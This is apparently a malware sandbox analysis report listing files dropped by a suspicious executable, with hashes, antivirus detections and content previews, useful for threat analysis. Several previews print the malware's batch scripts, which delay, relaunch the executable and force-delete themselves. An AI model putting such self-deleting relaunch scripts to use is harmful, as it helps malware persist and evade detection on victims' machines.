                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1915
                                                  Entropy (8bit):5.363869398054153
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
                                                  MD5:73E7DD0D3AE6532ADBC6411F439B5DE3
                                                  SHA1:427BE8DB5338D856906C1DDFBD186319A02F7567
                                                  SHA-256:A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
                                                  SHA-512:33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.403856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:YGD6:Y66
                                                  MD5:12423759F238681F52AD176F567E40E5
                                                  SHA1:40EF697827FDFA092710BE4A9E31DA709E51C8B8
                                                  SHA-256:18F2C80E937F09B1FEE256FC28F8A64D58B785D6571D226FAB1B978B6E44B554
                                                  SHA-512:EF0013A355B0EB9A8AED9EECDF2D7510B95149464CE2029A37B09701DC0BA965B9BCD5594C012832AF6A0AD616046D39F045F18A586B4AD3C0CCF4119E1CF935
                                                  Malicious:false
                                                  Preview:YlbCauPgGBWN8RSk4u1OCrMbU
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.33571833612795
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIw8Lq:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiX
                                                  MD5:9351F79BD1CD31E7FE87091950C7FD81
                                                  SHA1:4C66D52E5706CA78F2F62F8C1516E4D269860993
                                                  SHA-256:B0074EFED534C4CF700B424F00C7AC919F6AE718D0F719B9B0C0F7901A7140D2
                                                  SHA-512:65245A74D2EF54066930D5C39CF7AA3EEBAB3A44B9EA6977AC5CB5F2EC104F1E43A09E7B08C717F0FD9627A550F01618F33D9BC5DBB46DC20D0E81670D271AC1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4XCyKdTKaY.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):3.943465189601647
                                                  Encrypted:false
                                                  SSDEEP:3:Wb6l8zUfYpcn:WbEMUfgc
                                                  MD5:69FC3AF6E59633BAF77E5A45DE32706B
                                                  SHA1:0730B030C456CC38B5D6D3967BB16A9961EF196F
                                                  SHA-256:CE8F1F6A358FD7D4FBC5DDF07D0DFFDBC6577E7638692B2DDED86BFCF8CAD7FA
                                                  SHA-512:3F6BA7EE4523BB98B4287E22A0B7AE25727D51777F4868B9C1A1751740E1341C7B03309D7B335A46D60C2845DC0C3FFDF0BF563C6B9850EC1B502DC279C8DE25
                                                  Malicious:false
                                                  Preview:qjAY46izyJQ5qbYnb1zzUNy1y
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.4838561897747224
                                                  Encrypted:false
                                                  SSDEEP:3:bLqMmLTj01zn:nqM+0x
                                                  MD5:019371CE95C868CE12F1692784C44974
                                                  SHA1:3FB1F1BA100120627180E3F6F34E99FFCB955A7F
                                                  SHA-256:B097E79B17ACDF86394649B5F0451EA042AF2BA11C344E786AE1010AD77BEAE0
                                                  SHA-512:08D37D58DFA343EBC3728861FBA567414CF0420DE13ED3E21239E2E18351D3E9BCD86DADB6ADF08BE7D40DB217F946E60FB8E021C92CCEEF1E8484F01CB1EB1D
                                                  Malicious:false
                                                  Preview:s9dIecXYkACn68DI2rcyK5PNB
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.213660689688185
                                                  Encrypted:false
                                                  SSDEEP:3:nxk7kh:xqs
                                                  MD5:ACCB27010CC20AE8E555D6E33DD8C65C
                                                  SHA1:46E3E9585C9B65E836C26322B3DECDC1478C1653
                                                  SHA-256:6BDE11F0EFA86E91E775C75E6C4B22F9CA746B145AE127F92EF38E763FB73186
                                                  SHA-512:0E68643E2B2FBB42E2A10577678AE48382FF0CC688A0CC87A3E89C3816F23D8DDF577A7E10168547A0719CE04DC482FF8802670A76E890B7B0DD676EA967FF15
                                                  Malicious:false
                                                  Preview:7HlEZuKHnNiGrv0rY8Q86rXlt
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.243856189774723
                                                  Encrypted:false
                                                  SSDEEP:3:Hrn0hCzuzrrLA:LnTzuzro
                                                  MD5:A06A5BCB09E6F18756B196CA9B336971
                                                  SHA1:FE6CAF8EA3E36613A190B67AA65B9AA2BD8C2A2C
                                                  SHA-256:88C9784D1C0BE211E085978E29DB677EEB1CD9E0344FB7F9B64E10FA9E789004
                                                  SHA-512:075E53EFFF9FB844D97AD92DBBBE3E884BEE781D9B6408F85F980CFA083B45D51D73557F7F5791556140442CEB91BDB1BA1769EBA494BDEDA2F78B5926D18FCF
                                                  Malicious:false
                                                  Preview:u7NhPwbDgZvJpkraKVagNnZcJ
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.373989033273579
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAItirC:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiC
                                                  MD5:009E987CF7BAF2447EA838E533DE9C0B
                                                  SHA1:DE325FDD0EA7F8205F970A28E8444EB519B362D4
                                                  SHA-256:4CDFF14857774B3D6F8052A66921E29A8F55FF88484768F39B843454F5388A27
                                                  SHA-512:C0BF8689605A41F395B2BFD4FA5BF82A44CB7E0795B010492928C6E4A193CF2670E9CBC1D7B4B19CD3E0363E69E553D36E4985B3D292AC25B9DE5FD302203DFC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\JRGN3N9ZXF.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.023465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:MLgOLxbvh:xmp
                                                  MD5:89E29B3788226933F30A9E4F1D452931
                                                  SHA1:E8FE48A61A7D41ECCC54842596E10B887DF39BF3
                                                  SHA-256:B8208ABE65A7DCD911369E313DD538005A213F69BA3FB87EAF544492EA052B34
                                                  SHA-512:6333998F7BE3E65E4F7C5F743E31CCD4C9C39834C176B0DCBC650DA216C0A7993EC739C279C4BF0D440C60AF2228623C983509F22191F417A29882BE423B7CE9
                                                  Malicious:false
                                                  Preview:eESnrU4MnTsM4AEJhRXeW4Gez
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.2763640749091785
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fNH:HTg9uYDEmetZ9
                                                  MD5:F1D4C7B9D1520A50BF3F2D7DB51081A0
                                                  SHA1:7DDBA09E69B3717095FB504642299AEF579EDC2D
                                                  SHA-256:8B307A8DEA799BEB1D0D9C40C72FDC112E1B812E6926EF0F2141FC4702DA8DAA
                                                  SHA-512:C30CB72130F8E1A159ED5AF037FF31DEF79DDE60711B4E91560F7A466D3922F3F73B35B83E329222B4507BB107FCC16F6506D639E96DCFD96FBDCE2D1565760B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TqMgut2j0M.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.266309165832841
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fr:HTg9uYDEmetZz
                                                  MD5:97FEF771E61856E7C661189A8E050CD8
                                                  SHA1:C34A739A43DF40575EBE78CACC0B7F415D39EA1B
                                                  SHA-256:B97CC1CA4B88AD30D130222E235F84B2D8B1C0A44097AB3A3AFD2E01262137F2
                                                  SHA-512:89832893DEAD6458FCADEF26FF906AD033D464D30A73FBB6FE21434A8930CD1E88AED7AF44E135B39E32A55CF513B503747EA488E1DCFE3173E7393C719B65C9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aehWhM7TGU.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.311365017257263
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fihX:HTg9uYDEmetZU
                                                  MD5:6781D41625272A6DF01C22E0A0243EB7
                                                  SHA1:4AA0B2FB06EECAFB982356875EBE34BE9B0F8490
                                                  SHA-256:6F31A54B3A1A2D71003249E966AD714CC8293E9030B7C81F057A990E1ED40F14
                                                  SHA-512:66516323EE697887667419DF37F127A1D9BD1B268E040DD2769217A999CFC6B6A69F1D45B346D504327EE56BE63430E8EA44527BE04E9DDA6DCCAEDE15E80565
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bgR6NVhjy4.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.326693830912632
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIGO8q:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiG
                                                  MD5:8DC4E784351CA08A5907778C10380E30
                                                  SHA1:0B5F64D93FDEE5B3553FB570BEB560D33F2B00AB
                                                  SHA-256:D3507BE52E3963ADC959B3EF166A425B94EC5FB0768F17EC96D1293B20527B59
                                                  SHA-512:5708C869A6A0288273C4CF57875C98D78634BE7A7F0F9589D901F5F366E518A7930ADC36D2F3EB7C89450F3B1B078E1861788211C97C388D1671C6734650C5F7
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bqMLTwU6O8.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.30674036394868
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIzJqK:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiE
                                                  MD5:E12AC3439F0D54B0B56182F251906FD6
                                                  SHA1:7158CD0458B9275775C4E19BDAE8F143C9E01AA1
                                                  SHA-256:4417043C412548B747D396D326494C60719F7518A977DB14B4C63F9F808931B2
                                                  SHA-512:069823DA483207AB153C405DF05ADEDE61F7EC5E915C58AAC064A1AEDB7207E6833A1D74F24F384BAFF3A4E143C8EBFF17F376BC117AFA13D9E555DA96E05E7A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\cWXsH5vMZ0.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.103465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:5kQ0XsIKfVM5Gn:5Z0XvKfEGn
                                                  MD5:9171E60F21E43D93EA124BF28296781B
                                                  SHA1:53EEA48128B358E06BCD9860C718853C551E9BC9
                                                  SHA-256:59214E530D97969D7ECC2E1C03D64CA10AD4DFEEB1C88195A4BFB8271DDB3A1D
                                                  SHA-512:EB90ED16A171AFEE141D2398DAFE0F115A1CF31722918203F3000A75BF58E66A53D9F503F68C4A1E159704F4CF44D3C5C27D55074A1C5A09831B07A00AB15940
                                                  Malicious:false
                                                  Preview:P1sRAuQrI70Q1ojB0iiiXDY91
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.274764413759756
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fln:HTg9uYDEmetZdn
                                                  MD5:6C9C3704937AA33EFAFADDD8AFA12331
                                                  SHA1:6B9F89D56669357AE1416A9C41DC6BE5165A9916
                                                  SHA-256:829FEC811ABF0B425E412EE7700F07617E5B99C3B04A49D67DAFDAF602E23519
                                                  SHA-512:F356DDCEE3D75988A408531022F1EFB59E781A4E202907A5A99A5AEEBCD245B53C3AF69A37950BA124D94C2E448C34DD402EFB737A4243B57391404D3E8FEDAA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\iHmrx8Dkeu.bat"
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.293660689688185
                                                  Encrypted:false
                                                  SSDEEP:3:pXWmmEiIn:pGmmEiIn
                                                  MD5:9CAAABEEDE4A26149A9617C760DBFB60
                                                  SHA1:057A575490077BED342CBE323A298AA5212A72E2
                                                  SHA-256:39333F1B3B11C6064B77DA32D4A5798E1500BD599AC6000F8A3D1181B97E78F2
                                                  SHA-512:4427E9184BB345D41A1ECB3345C5101EE4D5AE8B27518BBEFCB7D92F6FD7E91E905DCE23C8C177D758A982105C476DFBAC15A5F20349C4026E7DDE8ABD8AA399
                                                  Malicious:false
                                                  Preview:jQLQ9bRgsCF08YoYtTiQaGd8y
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.163856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:fwQfiun:flqun
                                                  MD5:45FDF9906FB6DB537839725E356712EA
                                                  SHA1:A3CA502F2B6F8FACBF5FD3D39CA4B47BF07C373F
                                                  SHA-256:D4FF12A57ED0E9F7FE85B562014042E1705DEA37A806D541EEA9EB0B3E49A5F8
                                                  SHA-512:2B873274771A8CDCC39E6D3E31273B2C62349EFA6C0EFCE39D50BA0C4D31ADF3F61BF6DE4808761E00ECC1FDBF15B203AEA705C7894EEA367CE2C47A4DA9846F
                                                  Malicious:false
                                                  Preview:RGannhpYMK5OCXMKyGXecrjAc
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.340005372299452
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fYZ:HTg9uYDEmetZgZ
                                                  MD5:9747DB10B7D370585B26D96E0F146974
                                                  SHA1:798E5294B1303F8FD0E9D84F47B5B15574FF20C7
                                                  SHA-256:043D88135A9AC79135286D7C93B8B6AA07DE6C53560D87D1A0FDD8A7C90BE2A6
                                                  SHA-512:C654224D1D9C0B53EFA8E465F0D7AF1465212E60C0E6769E82A91A1905AA32D99A37DE83B2A0E51B63AD5C6B6119D1666EEC1E4B530C3CB7EF245B687CA0E04B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\pFxSEGDzP3.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.323856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:Pm58n:PI8n
                                                  MD5:43CA6C01D9BF84333DEFC028CE62E283
                                                  SHA1:5878731B9014577469A4115F0A41F0A8D667658A
                                                  SHA-256:4D3006D6458E5AED44B89254BF530CC7D87F7B347557B3BA5431D8F7433D842C
                                                  SHA-512:1C755A0B0598BCE690B712E60399CE589C3D2EA3ED917BBD8486FBE7BEFA0141EE9EFC24038515F3AB4F608B09FB91E456196CBAF647CED17DB0BB516432D23E
                                                  Malicious:false
                                                  Preview:khIO84k3JlELzt0sJz3urH9iU
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.299203482443155
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIKoHK:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwi/
                                                  MD5:CD5BF7CE70DA0F3CFF468DE9845C5E2D
                                                  SHA1:F0AE962C97C597C83C73535D3856DC2E1B498BAD
                                                  SHA-256:1C8426824FF0971782CD389E1E1379CAA11566CFD99B78B775B7F4BCEE0F3F9A
                                                  SHA-512:FAF71B5DC168DDFA8B13F4D52EF26418F9F553F056A52396EE141B950F9DF6733CAA4E7DD1941FBC586BBC9FF001D202C716B53488039D5B040CFAA6FBA423F0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yJr0BespZg.bat"
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Joe Sandbox View:
                                                  • Filename: T0jSGXdxX5.exe, Detection: malicious
                                                  • Filename: main.exe, Detection: malicious
                                                  • Filename: file_1443.exe, Detection: malicious
                                                  • Filename: lsass.exe, Detection: malicious
                                                  • Filename: t8xf0Y1ovi.exe, Detection: malicious
                                                  • Filename: dvc2TBOZTh.exe, Detection: malicious
                                                  • Filename: teh76E2k50.exe, Detection: malicious
                                                  • Filename: FuWRu2Mg82.exe, Detection: malicious
                                                  • Filename: auXl1Tzyme.exe, Detection: malicious
                                                  • Filename: 9D7RwuJrth.exe, Detection: malicious
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
